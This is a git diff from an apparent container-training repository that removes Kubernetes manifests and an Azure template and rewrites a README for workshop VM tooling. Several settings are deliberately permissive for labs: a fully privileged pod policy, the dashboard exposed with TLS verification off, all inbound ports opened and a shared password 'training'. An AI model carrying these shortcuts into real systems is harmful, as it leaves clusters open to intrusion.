schedulerName: stork
containers:
- name: postgres
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr

View File

@@ -1,67 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
image: alpine
imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,100 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -1,5 +0,0 @@
[build]
base = "slides"
publish = "slides"
command = "./build.sh once"

View File

@@ -32,7 +32,7 @@ Virtualbox, Vagrant and Ansible
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).

View File

@@ -71,7 +71,7 @@ to your node, then run the following command:
```bash
sudo curl -L \
https://github.com/docker/compose/releases/download/1.15.0/docker-compose-`uname -s`-`uname -m` \
https://github.com/docker/compose/releases/download/1.9.0/docker-compose-`uname -s`-`uname -m` \
-o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
```

View File

@@ -2,6 +2,7 @@ FROM debian:jessie
MAINTAINER AJ Bowen <aj@soulshake.net>
RUN apt-get update && apt-get install -y \
wkhtmltopdf \
bsdmainutils \
ca-certificates \
curl \
@@ -11,20 +12,19 @@ RUN apt-get update && apt-get install -y \
man \
pssh \
python \
python-docutils \
python-pip \
python-docutils \
ssh \
wkhtmltopdf \
xvfb \
--no-install-recommends \
&& rm -rf /var/lib/apt/lists/*
RUN pip install \
awscli \
jinja2 \
pdfkit \
PyYAML \
termcolor
RUN mv $(which wkhtmltopdf) $(which wkhtmltopdf).real
COPY lib/wkhtmltopdf /usr/local/bin/wkhtmltopdf
WORKDIR $$HOME
RUN echo "alias ll='ls -lahF'" >> /root/.bashrc
ENTRYPOINT ["/root/prepare-vms/scripts/trainer-cli"]

View File

@@ -1,194 +1,110 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS
## Prerequisites
- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables for AWS
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./trainer` commands to create instances, install docker, setup each users environment in node1, other management tasks
- run `./trainer cards` command to generate PDF for printing handouts of each users host IP's and login info
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
The Docker Compose file here is used to build a image with all the dependencies to run the `./trainer` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](trainer#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
## Preparing to Run `./trainer`
### Required AWS Permissions/Info
- Initial assumptions are you're using a root account. If you'd like to use a IAM user, it will need `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
- Using a non-default VPC or Security Group isn't supported out of box yet, but until then you can [customize the `trainer-cli` script](scripts/trainer-cli#L396-L401).
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./trainer opensg` which opens up all ports.
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_DEFAULT_REGION`
Make a copy of one of the example files in the `infra` directory.
### Update/copy `settings/example.yaml`
For instance:
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `trainer deploy`, `trainer cards`, etc.
```bash
cp infra/example.aws infra/aws-us-west-2
```
./trainer cards 2016-09-28-00-33-bret settings/orchestration.yaml
Edit your infrastructure file to customize it.
You will probably need to put your cloud provider credentials,
select region...
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
Similarly, pick one of the files in `settings` and copy it
to customize it.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
You're all set!
## `./workshopctl` Usage
## `./trainer` Usage
```
workshopctl - the orchestration workshop swiss army knife
Commands:
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all notes are reporting as Ready
list List available groups in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a group of VMs
start Start a group of VMs
status List instance status for a given group
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a group of VMs
wrap Run this program in a container
./trainer <command> [n-instances|tag] [settings/file.yaml]
Core commands:
start n Start n instances
list [TAG] If a tag is provided, list its VMs. Otherwise, list tags.
deploy TAG Deploy all instances with a given tag
pull-images TAG Pre-pull docker images. Run only after deploying.
stop TAG Stop and delete instances tagged TAG
Extras:
ips TAG List all IPs of instances with a given tag (updates ips.txt)
ids TAG/TOKEN List all instance IDs with a given tag
shell Get a shell in the trainer container
status TAG Print information about this tag and its VMs
tags List all tags (per-region)
retag TAG/TOKEN TAG Retag instances with a new tag
Beta:
ami Look up Amazon Machine Images
cards FILE Generate cards
opensg Modify AWS security groups
```
### Summary of What `./workshopctl` Does For You
### Summary of What `./trainer` Does For You
- Used to manage bulk AWS instances for you without needing to use AWS cli or gui.
- Can manage multiple "tags" or groups of instances, which are tracked in `prepare-vms/tags/`
- Can also create PDF/HTML for printing student info for instance IP's and login.
- The `./workshopctl` script can be executed directly.
- The `./trainer` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. For now, this is hard coded.
### Example Steps to Launch a group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Export the environment variables needed by the AWS CLI (see **Required Environment Variables** above)
- Run `./trainer start N` Creates `N` EC2 instances
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./trainer deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
- If it errors or times out, you should be able to rerun
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
- Run `./trainer pull-images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./trainer cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
- Run `./trainer stop TAG` to terminate instances.
### Example Steps to Launch Azure Instances
## Other Tools
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
- Optional:
- Choose a name for the workshop (default is "workshop")
- Choose the number of instances (default is 3)
- Customize the desired instance size (default is Standard_D1_v2)
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
```
az group create --name workshop --location eastus
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
```
### Deploying your SSH key to all the machines
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
To display the IPs of the instances you've launched:
```
az vm list-ip-addresses --resource-group workshop --output table
```
### Installing extra packages
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
```
brew install jq
mkdir -p tags/myworkshop
```
2) And then generate the IP list:
```
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
```
After the workshop is over, remove the instances:
```
az group delete --resource-group workshop
```
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
- Generate cards to print and hand out: workshopctl cards `TAG`
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
- Source `postprep.rc`.
(This will install a few extra packages, add entries to
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
## Even More Details
@@ -201,7 +117,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -209,37 +125,39 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./trainer deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
#### Pre-pull images
$ ./workshopctl pull_images TAG
$ ./trainer pull-images TAG
#### Generate cards
$ ./workshopctl cards TAG
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
$ ./trainer cards TAG settings/somefile.yaml
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./trainer list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./trainer list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs
$ ./workshopctl stop TAG
$ ./trainer stop TAG
## ToDo

View File

@@ -1,250 +0,0 @@
{
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workshopName": {
"type": "string",
"defaultValue": "workshop",
"metadata": {
"description": "Workshop name."
}
},
"vmPrefix": {
"type": "string",
"defaultValue": "node",
"metadata": {
"description": "Prefix for VM names."
}
},
"numberOfInstances": {
"type": "int",
"defaultValue": 3,
"metadata": {
"description": "Number of VMs to create."
}
},
"adminUsername": {
"type": "string",
"defaultValue": "ubuntu",
"metadata": {
"description": "Admin username for VMs."
}
},
"sshKeyData": {
"type": "string",
"defaultValue": "",
"metadata": {
"description": "SSH rsa public key file as a string."
}
},
"imagePublisher": {
"type": "string",
"defaultValue": "Canonical",
"metadata": {
"description": "OS image publisher; default Canonical."
}
},
"imageOffer": {
"type": "string",
"defaultValue": "UbuntuServer",
"metadata": {
"description": "The name of the image offer. The default is Ubuntu"
}
},
"imageSKU": {
"type": "string",
"defaultValue": "16.04-LTS",
"metadata": {
"description": "Version of the image. The default is 16.04-LTS"
}
},
"vmSize": {
"type": "string",
"defaultValue": "Standard_D1_v2",
"metadata": {
"description": "VM Size."
}
}
},
"variables": {
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
"vmName": "[parameters('vmPrefix')]",
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
"publicIPAddressName": "PublicIP",
"publicIPAddressType": "Dynamic",
"virtualNetworkName": "MyVNET",
"netSecurityGroup": "MyNSG",
"addressPrefix": "10.0.0.0/16",
"subnet1Name": "subnet-1",
"subnet1Prefix": "10.0.0.0/24",
"nicName": "myVMNic"
},
"resources": [
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/publicIPAddresses",
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "publicIPLoop",
"count": "[parameters('numberOfInstances')]"
},
"properties": {
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/virtualNetworks",
"name": "[variables('virtualNetworkName')]",
"location": "[resourceGroup().location]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
],
"properties": {
"addressSpace": {
"addressPrefixes": [
"[variables('addressPrefix')]"
]
},
"subnets": [
{
"name": "[variables('subnet1Name')]",
"properties": {
"addressPrefix": "[variables('subnet1Prefix')]",
"networkSecurityGroup": {
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkInterfaces",
"name": "[concat(variables('nicName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "nicLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"privateIPAllocationMethod": "Dynamic",
"publicIPAddress": {
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
},
"subnet": {
"id": "[variables('subnet1Ref')]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-12-01",
"type": "Microsoft.Compute/virtualMachines",
"name": "[concat(variables('vmName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "vmLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('vmSize')]"
},
"osProfile": {
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true,
"ssh": {
"publicKeys": [
{
"path": "[variables('sshKeyPath')]",
"keyData": "[parameters('sshKeyData')]"
}
]
}
}
},
"storageProfile": {
"osDisk": {
"createOption": "FromImage"
},
"imageReference": {
"publisher": "[parameters('imagePublisher')]",
"offer": "[parameters('imageOffer')]",
"sku": "[parameters('imageSKU')]",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
}
]
}
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkSecurityGroups",
"name": "[variables('netSecurityGroup')]",
"location": "[resourceGroup().location]",
"tags": {
"workshop": "[parameters('workshopName')]"
},
"properties": {
"securityRules": [
{
"name": "default-open-ports",
"properties": {
"protocol": "Tcp",
"sourcePortRange": "*",
"destinationPortRange": "*",
"sourceAddressPrefix": "*",
"destinationAddressPrefix": "*",
"access": "Allow",
"priority": 1000,
"direction": "Inbound"
}
}
]
}
}
],
"outputs": {
"resourceID": {
"type": "string",
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
}
}
}

Some files were not shown because too many files have changed in this diff Show More